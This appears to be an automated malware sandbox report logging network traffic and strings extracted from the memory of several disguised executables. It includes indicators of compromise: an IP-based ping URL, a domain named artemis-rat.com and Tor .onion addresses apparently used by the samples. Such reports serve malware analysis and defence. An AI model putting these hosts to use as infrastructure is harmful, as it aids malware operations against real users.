Server: squid/5.7
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3628
X-Squid-Error: ERR_ACCESS_DENIED 0
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from lb1
X-Cache-Lookup: NONE from lb1:3128
Via: 1.1 lb1 (squid/5.7)
Connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 503 Service Unavailable
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Length: 69
Data Ascii: dial tcp: lookup artemis-rat.com on 127.0.0.1:53: server misbehaving
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Server: squid/4.7
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5
X-Squid-Error: TCP_RESET 0
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from proxy.wakoopa.com
Via: 1.1 proxy.wakoopa.com (squid/4.7)
Connection: keep-alive
Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 403 Forbidden
                  Content-Type: text/html; charset=utf-8
                  Server: ADM/2.1.1
                  Connection: close
                  Content-Length: 509
                  <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 403 Forbidden
                  Server: Beaver
                  Cache-Control: no-cache
                  Content-Type: text/html
                  Content-Length: 635
                  Connection: close
                  Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 503 Service Unavailable
                  Server: squid/4.14
                  Mime-Version: 1.0
                  Date: Mon, 11 Mar 2024 02:30:42 GMT
                  Content-Type: text/html;charset=utf-8
                  Content-Length: 3846
                  X-Squid-Error: ERR_DNS_FAIL 0
                  Vary: Accept-Language
                  Content-Language: en
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 403 Forbidden
                  Server: squid
                  Mime-Version: 1.0
                  Date: Mon, 11 Mar 2024 02:30:42 GMT
                  Content-Type: text/html;charset=utf-8
                  Content-Length: 17
                  X-Squid-Error: ERR_ACCESS_DENIED 0
                  X-Cache: MISS from cdn-fintech.info
                  X-Cache-Lookup: NONE from cdn-fintech.info:8123
                  Connection: keep-alive
                  Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                  Data Ascii: ERR_ACCESS_DENIED
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 503 Service Unavailable
                  Server: squid/3.5.27
                  Mime-Version: 1.0
                  Date: Mon, 11 Mar 2024 02:30:42 GMT
                  Content-Type: text/html;charset=utf-8
                  Content-Length: 3938
                  X-Squid-Error: ERR_DNS_FAIL 0
                  Vary: Accept-Language
                  Content-Language: en
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 403 Forbidden
                  Server: squid
                  Mime-Version: 1.0
                  Date: Mon, 11 Mar 2024 02:30:43 GMT
                  Content-Type: text/html;charset=utf-8
                  Content-Length: 17
                  X-Squid-Error: ERR_ACCESS_DENIED 0
                  X-Cache: MISS from cdn-fintech.info
                  X-Cache-Lookup: NONE from cdn-fintech.info:8123
                  Connection: keep-alive
                  Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                  Data Ascii: ERR_ACCESS_DENIED
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 403 Forbidden
                  Server: squid/3.5.28
                  Mime-Version: 1.0
                  Date: Mon, 11 Mar 2024 02:30:43 GMT
                  Content-Type: text/html;charset=utf-8
                  Content-Length: 952
                  X-Squid-Error: ERR_ACCESS_DENIED 0
                  Content-Language: en
                  X-Cache: MISS from ah_test
                  Via: 1.1 ah_test (squid/3.5.28)
                  Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Connection: close | Content-Type: text/html | Cache-Control: no-cache | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | Content-Length: 4872
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: MyWebServer/3.6.20 Unicode (By TGY) | Date: Mon, 11 Mar 2024 02:30:43 GMT | Content-Type: text/html; Charset=GB2312 | Content-Length: 154 | Connection: Keep-Alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1><hr><h3>MyWebServer/3.6.20 Unicode (By TGY)</h3></center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: squid | Mime-Version: 1.0 | Date: Mon, 11 Mar 2024 02:30:44 GMT | Content-Type: text/html;charset=utf-8 | Content-Length: 17 | X-Squid-Error: ERR_ACCESS_DENIED 0 | X-Cache: MISS from cdn-fintech.info | X-Cache-Lookup: NONE from cdn-fintech.info:8123 | Connection: keep-alive | Data Ascii: ERR_ACCESS_DENIED
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: squid | Mime-Version: 1.0 | Date: Mon, 11 Mar 2024 02:30:45 GMT | Content-Type: text/html;charset=utf-8 | Content-Length: 17 | X-Squid-Error: ERR_ACCESS_DENIED 0 | X-Cache: MISS from cdn-fintech.info | X-Cache-Lookup: NONE from cdn-fintech.info:8123 | Connection: keep-alive | Data Ascii: ERR_ACCESS_DENIED
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/html | Server: Zscaler/6.2 | Cache-Control: no-cache | Access-Control-Allow-Origin: * | Content-length: 13607
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: squid/4.7 | Mime-Version: 1.0 | Date: Mon, 11 Mar 2024 02:30:46 GMT | Content-Type: text/html;charset=utf-8 | Content-Length: 5 | X-Squid-Error: TCP_RESET 0 | Vary: Accept-Language | Content-Language: en | X-Cache: MISS from proxy.wakoopa.com | Via: 1.1 proxy.wakoopa.com (squid/4.7) | Connection: keep-alive | Data Ascii: reset
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/html | Server: Zscaler/6.2 | Cache-Control: no-cache | Access-Control-Allow-Origin: * | Content-length: 13597
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Mon, 11 Mar 2024 02:30:46 GMT | Server: Apache/2.4.18 (Ubuntu) | Content-Length: 281 | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 503 Service Unavailable
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: squid | Mime-Version: 1.0 | Date: Mon, 11 Mar 2024 02:30:46 GMT | Content-Type: text/html;charset=utf-8 | Content-Length: 3699 | X-Squid-Error: ERR_ACCESS_DENIED 0 | X-Cache: MISS from host | X-Cache-Lookup: NONE from host:3128 | Connection: close | Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: squid/5.7 | Mime-Version: 1.0 | Date: Mon, 11 Mar 2024 02:30:47 GMT | Content-Type: text/html;charset=utf-8 | Content-Length: 3628 | X-Squid-Error: ERR_ACCESS_DENIED 0 | Vary: Accept-Language | Content-Language: en | X-Cache: MISS from lb1 | X-Cache-Lookup: NONE from lb1:3128 | Via: 1.1 lb1 (squid/5.7) | Connection: close
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 403 Forbidden
                  Date: Mon, 11 Mar 2024 02:30:48 GMT
                  Content-Length: 101
                  Content-Type: text/plain; charset=utf-8
                  Data Ascii: HTTP/1.1 403 Forbidden Please topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Content-Type: text/plain; charset=utf-8
                  X-Content-Type-Options: nosniff
                  Date: Mon, 11 Mar 2024 02:30:51 GMT
                  Content-Length: 19
                  Data Ascii: 404 page not found
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Mon, 11 Mar 2024 02:30:52 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 299
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Mon, 11 Mar 2024 02:30:52 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 299
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Mon, 11 Mar 2024 02:30:55 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 299
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Mon, 11 Mar 2024 02:30:56 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 299
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Mon, 11 Mar 2024 02:30:57 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 299
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Mon, 11 Mar 2024 02:30:58 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 299
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Mon, 11 Mar 2024 02:30:59 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 299
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                  Source: kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.0000000000730000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.0000000000730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=five&s=ab_0
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
                  Source: AddInProcess32.exe, 00000005.00000002.4510003590.0000000003452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.g
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: http://grub.org)Mozilla/5.0
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://invalidlog.txtlookup
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency
                  Source: AddInProcess32.exe, 00000005.00000002.4510003590.0000000003655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://namemail.org
                  Source: AddInProcess32.exe, 00000005.00000002.4510003590.000000000351B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.000000000307D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.00000000034ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://net.geo.opera.com
                  Source: AddInProcess32.exe, 00000005.00000002.4510003590.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                  Source: 3BiVM2uOsvGVXA1BoDorVuCU.exe, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4477722123.000000000040B000.00000002.00000001.01000000.00000010.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4483730306.000000000040B000.00000002.00000001.01000000.00000016.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000000.2349135460.000000000040B000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
                  Source: AddInProcess32.exe, 00000005.00000002.4510003590.00000000036C1000.00000004.00000800.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000000.2237561133.000000000040B000.00000002.00000001.01000000.0000000B.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4477722123.000000000040B000.00000002.00000001.01000000.00000010.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4483730306.000000000040B000.00000002.00000001.01000000.00000016.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000000.2349135460.000000000040B000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onion
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onionhttp://o3fonzjs63n3ovdmbb5tfew6
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0D6000.00000004.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C07C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C07A000.00000004.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionC:
